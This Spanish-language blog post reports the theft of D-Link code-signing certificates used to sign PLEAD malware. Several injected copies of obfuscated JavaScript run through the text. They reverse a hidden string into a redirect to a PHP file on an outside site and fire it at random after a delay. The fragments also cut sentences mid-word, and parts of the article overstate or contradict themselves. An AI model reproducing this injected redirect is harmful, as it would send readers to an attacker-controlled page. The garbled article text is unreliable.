ROBAN CERTIFICADOS DE ROUTERS PARA DISTRIBUIR VIRUS Y OBTENER CONTRASEÑAS
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to.com/wp-content/uploads/2018/07/hackers-dlink.jpg” width=”900″ height=”540″ /></p>
<p>No hay día que no nos enfrentemos a una nueva brecha o agujero de seguridad. Ayer te hablábamos de un problema con el servicio de Timehop que dejó expues<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tos los datos de 21 millones de usuarios. Hoy la cosa va de routers y del robo de unos certificados que los criminales habrían usado para distribuir malware o virus y obtener contraseñas y otros datos de las víctimas.
Si tienes un router de la marca taiwanesa D-Link, fabricante de otros productos de red, ponerte en alerta. Porque un grupo de hackers han conseguido perpetrar el robot de los certificados de seguridad que usa la compañía para comprobar la autenticidad de los equipos.
Lo que hacen los cibercriminales con ellos es simular la autenticidad de los productos de D-Link, con el objetivo de inocular malware en los equipos, robar información privada de los usuarios e incluso hacerse con los datos de acceso a distintos servicios y aplicaciones.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to.com/wp-content/uploads/2018/07/certificado-dlink.png” width=”900″ height=”572″ /><br />
certificado dlink</p>
<p>LOS CERTIFICADOS DE D-LINK, EN PELIGRO<br />
Pero, ¿qué ha ocurrido exactamente? Desde el medio Ars Technica informan de que se ha producido un robo a través de una brecha de seguridad existente. Parece ser que se han obtenido unos certificados que habitualmente sirven para verificar, de manera crip<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tográfica, que sistemas como los D-Link y Changing Information Technology son legítimos.
Lo que ha indicado este medio es que en estos momentos todos los dispositivos que funcionan con Windows como macOS de Apple se encuentran en peligro. Estos certificados permiten a los usuarios estar seguros de que los archivos y los ejecutables son 100% seguros y de confianza.
¿Y qué ocurrirá ahora? Pues en principio, al haber conseguido estos certificados, los hackers tienen la potestad de introducir malware en los ordenadores. En estos casos, el sistema de detección ha saltado por completo, de modo que no hay nada que pueda frenar los virus o estrategias de malware que los cibercriminales quieran colar por el agujero.
Al mismo tiempo, parece que ni tan siquiera los antivirus serán capaces de detectar estas intromisiones. Estos indicarán que los archivos y aplicaciones son legítimos al cien por cien, de modo que no se producirán avisos ni acciones por parte de los softwares de seguridad.
dlink
PROBLEMAS EN LA PRIVACIDAD DE LOS SISTEMAS
Pero Ars Technica cuenta que el asunto se ha agravado por la naturaleza de estos certificados. Parece ser que estos se usan habitualmente para verificar la identidad de los clientes de dispositivos como las cámaras web e IP a través del navegador. Esto puede incrementar todavía más el peligro al que se exponen los usuarios de estos sistemas.
Si eres usuario de alguno de estos dispositivos, debes saber que la solución no está en tus manos. Nada más lejos de la realidad. Lo primero que ha hecho D-Link y Changing Information Technology es cancelar o revocar los certificados que saben con certeza que han sido sustraídos.
Sin embargo, todavía habrá que esperar un poco más hasta que ambas firmas presenten un firmware que incluirá los parches de seguridad correspondientes. La cosa se agrava si pensamos en aquellos productos o dispositivos del Internet de las Cosas que tenemos cerca de nosotros, usamos habitualmente, pero no actualizamos nunca. En estos casos, los equipos seguirán contando con certificados caducados y por tanto, quedarán expuestos al peligro.
D-Link ha comunicado lo siguiente: D-Link encontró recientemente que dos de sus certificados de inicio fueron robados. Nada más descubrirlo, inmediatamente revocamos los certificados e investigamos el problema. Junto a otras compañías asiáticas, fuimos víctimas de un ataque de un grupo de ciberespionaje usando el malware PLEAD para robar información confidencial de compañías y organizaciones basadas en Asia, particularmente en Taiwán, Japón y Hong Kong. Los dos certificados se revocaron el 3 de julio y se han creado nuevos certificados para resolver este problema.
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.